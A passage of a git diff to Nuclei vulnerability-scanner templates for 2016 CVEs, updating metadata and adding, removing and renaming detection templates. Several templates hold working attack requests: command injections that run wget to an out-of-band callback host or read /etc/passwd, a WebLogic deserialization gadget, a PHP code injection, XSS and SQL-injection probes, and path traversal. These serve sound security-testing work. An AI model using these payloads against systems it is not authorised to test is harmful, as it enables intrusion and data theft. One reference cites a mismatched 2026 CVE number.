vulnerability and ensure the device is not accessible from the internet. reference: @@ -18,15 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2016-10108 cwe-id: CWE-77 - epss-score: 0.84853 - epss-percentile: 0.98189 + epss-score: 0.86242 + epss-percentile: 0.98335 cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:* metadata: max-request: 1 vendor: western_digital product: mycloud_nas shodan-query: http.favicon.hash:-1074357885 - tags: packetstorm,cve,cve2016,rce,oast,wdcloud + tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital http: - raw: @@ -42,4 +44,4 @@ http: - contains(interactsh_protocol, "dns") - status_code == 200 condition: and -# digest: 4a0a00473045022100b48315a429a010bd63a0753fac6aa41c637e4a2ecb89a85c97f2c7caa3ca3c5e02204f822becf3819902e770897b80f8ad9c94c3526efbcd11fbb7a5a5a6bcebf318:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022009c2486f30becc2499ca04c5fd0ac65f865b151e080af9af519b44a6d8dd42db022100b5c4bd69f88ec99e269d3b35db9eabdcffed4cb8a89aea1aa13bc5576b8349f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-10368.yaml b/nuclei-templates/CVE-2016/CVE-2016-10368.yaml index 83bb9e950a..f9d85a4d80 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-10368.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-10368.yaml @@ -6,18 +6,31 @@ info: severity: medium description: | Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI. + impact: | + An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware. + remediation: | + Apply the latest patch or upgrade to a version that is not affected by the vulnerability. reference: - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774 - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 - https://nvd.nist.gov/vuln/detail/CVE-2016-10368 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-10368 cwe-id: CWE-601 - tags: cve,cve2016,redirect,opsview,authenticated + epss-score: 0.00204 + epss-percentile: 0.57743 + cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* + metadata: + max-request: 1 + vendor: opsview + product: opsview + tags: cve2016,cve,redirect,opsview,authenticated -requests: +http: - raw: - | POST /login HTTP/1.1 @@ -31,10 +44,9 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - type: status status: - 302 - -# Enhanced by mp on 2022/10/12 +# digest: 490a0046304402205efe425e5d9b18e4d0fbbc16efa3c8463f7588294009126f1ce333acc1f041de0220194d5a323c78df75dd1216016dc142581916068c79129fc2159ea61553b623b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-10960.yaml b/nuclei-templates/CVE-2016/CVE-2016-10960.yaml deleted file mode 100644 index b448f10340..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-10960.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2016-10960 - -info: - name: WordPress wSecure Lite < 2.4 - Remote Code Execution - author: daffainfo - severity: high - description: WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter. - reference: - - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ - - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 - - https://wordpress.org/plugins/wsecure/#developers - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2016-10960 - cwe-id: CWE-20 - metadata: - google-query: inurl:"/wp-content/plugins/wsecure" - tags: cve,cve2016,wordpress,wp-plugin,rce - -requests: - - method: POST - path: - - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" - body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="' - - matchers-condition: and - matchers: - - type: word - words: - - "Nuclei: CVE-2016-10960" - condition: and - part: header - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/CVE-2016/CVE-2016-10973.yaml b/nuclei-templates/CVE-2016/CVE-2016-10973.yaml index c705e21274..38766f39fb 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-10973.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-10973.yaml @@ -1,24 +1,36 @@ id: CVE-2016-10973 info: - name: brafton WordPress Plugin <=3.4.7 - Reflected XSS + name: Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting author: Harsh severity: medium description: | The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.9 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/93568433-0b63-4ea7-bbac-4323d3ee0abd - https://nvd.nist.gov/vuln/detail/CVE-2026-10973 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-10973 cwe-id: CWE-79 + epss-score: 0.00177 + epss-percentile: 0.54991 + cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* metadata: verified: true - tags: cve,cve2016,xss,brafton,reflected,auth + max-request: 2 + vendor: brafton + product: brafton + framework: wordpress + tags: cve2016,cve,wpscan,wordpress,wp,wp-plugin,xss,brafton,authenticated -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -26,16 +38,16 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | - GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83)) HTTP/1.1 + GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(body_2, "alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))")' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "tab = alert(document.domain);")' - 'contains(body_2, "Brafton Article Loader")' condition: and +# digest: 490a004630440220056398545c7971a832b6a0a6562ed13c279b426e0b8783134e5536c67d1a589d0220409848bc2ce496563f76afcdeb4851709c338b118dba11b50c81cefc0a171f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-1555.yaml b/nuclei-templates/CVE-2016/CVE-2016-1555.yaml deleted file mode 100644 index 7868529960..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1555.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2016-1555 -info: - name: NETGEAR WNAP320 Access Point Firmware Remote Command Execution - author: gy741 - severity: critical - description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. - reference: - - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE - - https://nvd.nist.gov/vuln/detail/CVE-2016-1555 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cve-id: CVE-2016-1555 - cwe-id: CWE-77 - tags: netgear,rce,oast,router - -requests: - - raw: - - | - POST /boardDataWW.php HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded - - macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2016/cve-2016-2004.yaml b/nuclei-templates/CVE-2016/CVE-2016-2004.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-2004.yaml rename to nuclei-templates/CVE-2016/CVE-2016-2004.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-3088.yaml b/nuclei-templates/CVE-2016/CVE-2016-3088.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-3088.yaml rename to nuclei-templates/CVE-2016/CVE-2016-3088.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-3510.yaml b/nuclei-templates/CVE-2016/CVE-2016-3510.yaml index e8ed87a996..64e8374d4e 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-3510.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-3510.yaml @@ -6,38 +6,55 @@ info: severity: critical description: | Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586. - reference: - - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py remediation: | Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016. + reference: + - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py + - http://packetstormsecurity.com/files/152324/Oracle-Weblogic-Server-Deserialization-MarshalledObject-Remote-Code-Execution.html + - http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html + - http://www.securitytracker.com/id/1036373 + - https://www.tenable.com/security/research/tra-2016-21 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-3510 cwe-id: CWE-119 - epss-score: 0.0162000000 + epss-score: 0.04254 + epss-percentile: 0.92018 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - tags: cve,cve2016,weblogic,t3,rce,oast,deserialization,network - + max-request: 2 + vendor: oracle + product: weblogic_server + tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network variables: start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000" end: "fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078" tcp: - inputs: - - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + - data: "t3 12.2.1 + + AS:255 + + HL:19 + + MS:10000000 + + PU:t3://us-l-breens:7001 + + \n" read: 1024 - - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}" + - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}" host: - "{{Hostname}}" - port: 7001 + - "{{Host}}:7001" read-size: 4 - matchers: - type: word part: interactsh_protocol words: - "dns" +# digest: 490a00463044022043a31295126d58fbaa38a9cc0e672c6e4196a6b16f7a075def013ab769902eac02206d807cc60eaf030e3c730656b6e69dde708c01dc451d042f9962615d675ac8fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-4437.yaml b/nuclei-templates/CVE-2016/CVE-2016-4437.yaml index fa73c5b8f7..33d3868821 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-4437.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-4437.yaml @@ -6,6 +6,10 @@ info: severity: high description: | Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter. + impact: | + Remote code execution + remediation: | + Upgrade to a patched version of Apache Shiro reference: - https://github.com/Medicean/VulApps/tree/master/s/shiro/1 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4437 @@ -17,13 +21,14 @@ info: cvss-score: 8.1 cve-id: CVE-2016-4437 cwe-id: CWE-284 - epss-score: 0.97483 + epss-score: 0.97507 + epss-percentile: 0.99981 cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: shiro - tags: cve,apache,rce,kev,packetstorm,cve2016,shiro,deserialization + tags: cve2016,cve,apache,rce,kev,packetstorm,shiro,deserialization,oast http: - raw: @@ -38,3 +43,4 @@ http: part: interactsh_protocol words: - dns +# digest: 4b0a00483046022100fb046cc08189c3a3e20f44ffc1f443e657b070eae65463098ac3eb10d32969300221009acd50c19a5ec2239925b1ff303224e37e8b277b8b11b7f92b84141650cd97f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/cve-2016-4975.yaml b/nuclei-templates/CVE-2016/CVE-2016-4975.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-4975.yaml rename to nuclei-templates/CVE-2016/CVE-2016-4975.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-6195.yaml b/nuclei-templates/CVE-2016/CVE-2016-6195.yaml index fcc5a820b8..76c43f3f6e 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-6195.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-6195.yaml @@ -1,22 +1,36 @@ id: CVE-2016-6195 info: - name: vBulletin <= 4.2.3 SQL Injection + name: vBulletin <= 4.2.3 - SQL Injection author: MaStErChO - severity: high + severity: critical description: | vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. + remediation: | + Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor. reference: - https://www.cvedetails.com/cve/CVE-2016-6195/ - https://www.exploit-db.com/exploits/38489 - - https://www.securityfocus.com/bid/94312 - https://enumerated.wordpress.com/2016/07/11/1/ - + - http://www.vbulletin.org/forum/showthread.php?t=322848 + - https://github.com/drewlong/vbully classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-6195 cwe-id: CWE-89 + epss-score: 0.00284 + epss-percentile: 0.68042 + cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* + metadata: + verified: "true" + max-request: 6 + vendor: vbulletin + product: vbulletin + shodan-query: title:"Powered By vBulletin" + tags: cve2016,cve,vbulletin,sqli,forum,edb http: - method: GET @@ -28,11 +42,18 @@ http: - "{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" - "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" + stop-at-first-match: true - - matchers-condition: or + matchers-condition: and matchers: - type: word part: body words: - "type=dberror" + + - type: status + status: + - 200 + - 503 + condition: or +# digest: 4a0a00473045022030269809613dc16694046c59ac978b011cbcc0e3fdc2021ebc2f19473ff08068022100b0d29f698de04fa6315694bcfc2096e474fd1b4c198284198f2a52cc101320bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-6210.yaml b/nuclei-templates/CVE-2016/CVE-2016-6210.yaml index 86c405ed7a..0cf11fcf80 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-6210.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-6210.yaml @@ -1,10 +1,9 @@ id: CVE-2016-6210 - info: name: OpenSSH username enumeration < v7.3 author: iamthefrogy,forgedhallpass severity: medium - tags: network,openssh + tags: cve,cve2016,network,openssh description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 @@ -16,18 +15,15 @@ info: cvss-score: 5.9 cve-id: CVE-2016-6210 cwe-id: CWE-200 - network: - host: - "{{Hostname}}" - "{{Host}}:22" - matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' - extractors: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' diff --git a/nuclei-templates/CVE-2016/CVE-2016-6277.yaml b/nuclei-templates/CVE-2016/CVE-2016-6277.yaml deleted file mode 100644 index c94e539a5d..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-6277.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2016-6277 -info: - name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE - author: pikpikcu - severity: high - description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. - reference: - - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 - - http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - - https://www.kb.cert.org/vuls/id/582384 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2016-6277 - cwe-id: CWE-352 - tags: cve,cve2016,netgear,rce,iot -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-6601.yaml b/nuclei-templates/CVE-2016/CVE-2016-6601.yaml index dd6f63cd03..96c42c3ebd 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-6601.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-6601.yaml @@ -5,18 +5,31 @@ info: author: 0x_Akoko severity: high description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system. + remediation: | + Upgrade to ZOHO WebNMS Framework version 5.2 SP1 or later to mitigate this vulnerability. reference: - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt - https://www.exploit-db.com/exploits/40229/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6601 + - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_cred_disclosure + - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_file_download classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-6601 cwe-id: CWE-22 - tags: edb,cve,cve2016,zoho,lfi,webnms + epss-score: 0.97503 + epss-percentile: 0.99977 + cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zohocorp + product: webnms_framework + tags: cve2016,cve,edb,zoho,lfi,webnms,zohocorp -requests: +http: - method: GET path: - "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd" @@ -30,5 +43,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 4a0a004730450220269d98ed6d3161ad0db0a03a7f0809a5f7c818c3ecc57b34ee4d3d4c63eaab40022100e6f5a74ea3414e32776536a764ae0baf50b8f383108184f7d3181f2b5d68cc24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-7834.yaml b/nuclei-templates/CVE-2016/CVE-2016-7834.yaml index b2110f66af..b621310690 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-7834.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-7834.yaml @@ -6,21 +6,31 @@ info: severity: high description: | Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials. + impact: | + An attacker can gain unauthorized access to the camera and potentially control its functions. + remediation: | + Upgrade to the latest version of the firmware provided by Sony. reference: - https://sec-consult.com/vulnerability-lab/advisory/backdoor-vulnerability-in-sony-ipela-engine-ip-cameras/ - https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/ - https://jvn.jp/en/vu/JVNVU96435227/index.html - https://nvd.nist.gov/vuln/detail/CVE-2016-7834 - remediation: | - Upgrade to the latest version of the firmware provided by Sony. + - https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras classification: cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2016-7834 cwe-id: CWE-200 - tags: sony,backdoor,unauth,telnet,iot,camera + epss-score: 0.00186 + epss-percentile: 0.55032 + cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: sony + product: snc_series_firmware + tags: cve2016,cve,sony,backdoor,unauth,telnet,iot,camera -requests: +http: - method: GET path: - "{{BaseURL}}/command/prima-factory.cgi" @@ -40,5 +50,4 @@ requests: - type: status status: - 204 - -# Enhanced by cs 09/23/2022 +# digest: 490a0046304402202f5f026ed0363e14939a797e8be1ba25052d97aeffbf9c4028fab947ee7964bc0220162d36ff26de6a7b2d99f415da04726f6316c88fb6f54a668f3814dff2f37ff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-8706.yaml b/nuclei-templates/CVE-2016/CVE-2016-8706.yaml index 4a632c40cf..0730a6857e 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-8706.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-8706.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.1 cve-id: CVE-2016-8706 cwe-id: CWE-190 - epss-score: 0.90293 - epss-percentile: 0.98508 + epss-score: 0.89998 + epss-percentile: 0.98714 cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -54,4 +54,4 @@ javascript: words: - "Auth failure" negative: true -# digest: 4b0a00483046022100860c0dd4dc35a6f64cf59dc33739dff50d020e1336a6a88ddd5e7db1c511436f022100f39967d90d2c746119d59bfb5a31a2e24c77d456aed6162ae84416b7afefa9b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b779e50c06772457c979559413b9c9ed1174a52656ee40abb96ea3a6fad1dc4022051980afb07dd370ab8740389b2a2fd654ee21d9e3534428f834520a9f47cab79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-0957.yaml b/nuclei-templates/CVE-2016/cve-2016-0957.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-0957.yaml rename to nuclei-templates/CVE-2016/cve-2016-0957.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000129.yaml b/nuclei-templates/CVE-2016/cve-2016-1000129.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-1000129.yaml rename to nuclei-templates/CVE-2016/cve-2016-1000129.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000132.yaml b/nuclei-templates/CVE-2016/cve-2016-1000132.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-1000132.yaml rename to nuclei-templates/CVE-2016/cve-2016-1000132.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000133.yaml b/nuclei-templates/CVE-2016/cve-2016-1000133.yaml new file mode 100644 index 0000000000..64968b022f --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000133.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-1000133 + +info: + name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 + tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000133 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000134.yaml b/nuclei-templates/CVE-2016/cve-2016-1000134.yaml new file mode 100644 index 0000000000..d11a917306 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000134.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-1000134 + +info: + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin hdw-tube v1.2 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 + tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000134 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000139.yaml b/nuclei-templates/CVE-2016/cve-2016-1000139.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-1000139.yaml rename to nuclei-templates/CVE-2016/cve-2016-1000139.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000141.yaml 